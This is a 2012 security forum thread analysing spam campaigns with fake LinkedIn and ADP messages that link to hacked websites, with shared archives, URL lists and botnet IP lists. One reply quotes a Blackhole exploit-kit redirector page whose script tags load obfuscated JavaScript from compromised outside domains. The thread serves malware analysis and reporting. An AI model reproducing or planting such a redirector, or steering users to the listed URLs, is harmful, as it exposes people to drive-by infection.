Author Topic: Spam with potentially malicious links  (Read 7460 times)

0 Members and 1 Guest are viewing this topic.

September 21, 2012, 09:22:03 pm
Read 7460 times

hhhobbit

  • Special Access
  • Full Member

  • Offline
  • *

  • 54
I have been getting some spam recently that has lots of hacked web-sites.  At first I thought they may be doing an OS check because nothing happened and I use Linux.  Now they are doing stuff with their PHP script.  I am asked if I want to leave.  Stay for what?  If you ask me they are potential phish.  Here is the main folder:

http://www.securemecca.com/public/PeskySpammer/

The FalseADP and FalseLinkedIn folders in this zip contain the messages and some analysis files:

http://www.securemecca.com/public/PeskySpammer/PeskySpammer.7z

But I have also put the URL lists (CRLF format) that are in those folders at the top level:

http://www.securemecca.com/public/PeskySpammer/Z-ADP-URLs.txt
http://www.securemecca.com/public/PeskySpammer/Z-LinkedIn-URLs.txt

All of this is changing at least every other day.  Lately I have been forwarding the direct send to me messages on to PhishTank and will inform them next.  Infrequently, the SMTP daemon bars the message I am sending from being sent so obviously these URLs are going to somebody else as well.  I will inform PhishTank next.  But the latest batch that I looked at don't even have Linked In or  ADP URLs in the messages.  All they have are the redirect links which are listed in the above two files. It is something you need to watch to see if it heads some place bad in the future.

September 21, 2012, 10:14:03 pm
Reply #1

dlipman

  • Special Access
  • Full Member

  • Offline
  • *

  • 60
Looking at the Z-LinkedIn-URLs.txt file  URLs such as;  http://ftp.doidasesantas.com.br/jY8rTg5u/index.html
fit the pattern of  EXP/JS.Blacole.BI  which is a web page that points to two other web sites that load an obfuscated JavaScript which then points to a Blackhole Exploit site.

Looking at the Z-ADP-URLs.txt URLs, they fit the pattern too but for the most part either the URL was removed or otherwise dealt with and I didn't see the following pattern which fits that of  EXP/JS.Blacole.BI

Code: [Select]
<html>
<h1>WAIT PLEASE</h1>
 <h3>Loading...</h3>
 <script type="text/javascript" src="http://dominik-quary.de/d4JZEN4d/js.js"></script>
<script type="text/javascript" src="http://monioudis.ch/bgtS6CPx/js.js"></script>

</html>

September 22, 2012, 09:06:56 pm
Reply #2

hhhobbit

  • Special Access
  • Full Member

  • Offline
  • *

  • 54
You have the complete href URL.  After it comes the title which is of course is
Linked-In for the Liinked-In type messages.  If you open the PeskySpammer.7z
file you will see all of the messages saved in the subfolders FalseADP-00, and
FalseLinkedIn-00. They are saved AS-IS with no alteration of the contents.  IOW
spamLI-00001.eml is what was saved from email.

It is puzzling what they are doing because like you said, it looks like an incomplete
Blackhole.  When I first tested them the PHP script did nothing, but I work from
Linux.  In terms of OS detection I was incorrectly (and humorously) identified as
Android the other day.  Yesterday (2012-09-21), the PHP bit with a "I won't let you
get away" so I don't think the original PHP did anything for OS detection and in
fact did almost nothing at all.  I think they are using them to tune where ever they
are heading or for training.  Well, that is what it is unless you buy they are so dum
 to send to HASH-USER@securemecca.com without knowing what they are doing.
I don't buy that but maybe I over-estimated them (doubtful).  So they have enough
stabbed servers to play around with and don't care that they become known.  But ...

1. It still gives the domains that already have injections that need to be patched.
Some of them have already fixed (maybe just partially) the problem.  Most have
done nothing and probably don't even know about it.  I have some multiples per
same domain but strip the multiples of the exact same URL duplicates down to
just one.

2. It gives me the sending IPs of their bot-nets which I am extracting and are in
these files which I now strip the duplicates down to just one:

http://www.securemecca.com/public/PeskySpammer/X-Originating-IP.txt
http://www.securemecca.com/public/PeskySpammer/X-Numeric.txt
(there are files of the same names in each of the sub-folders)

Again, they must have enough they don't care if those Windows machines are
fixed or are even so confident that they know nobody will ever get the bright
idea to find those machines to monitor what is going on.

That is not what I came to comment on.  What I came to say is that I have shifted
from CRLF -> LF for most files except the original messages (all email is in CRLF).
If on Windows use NotePad++, psPad, Vim or other editors that handle LF only.
That makes it possible for me to update these two files hot (every few hours):

http://www.securemecca.com/public/PeskySpammer/Z-ADP-URLs.txt
http://www.securemecca.com/public/PeskySpammer/Z-LinkedIn-URLs.txt

Today it is Linked-In day.   Yesterday it was ADP.  The day before that it was
Linked-In again and the day before that it was ADP which was the first day. Before
then for over three months I was getting fake pharmaceuticals.  My bet is they are
training hacker wannabees in the Anonymous crowd.  But they are being so cheeky
it would not surprise me at all that they turn malicious at some point or finally do
what they pretend to be doing now but are not doing - phish.

Ditto for the fake pharmaceuticals.  I almost never saw those domains in my regular
accounts as spam.

Maybe the FBI is doing it - just teasing.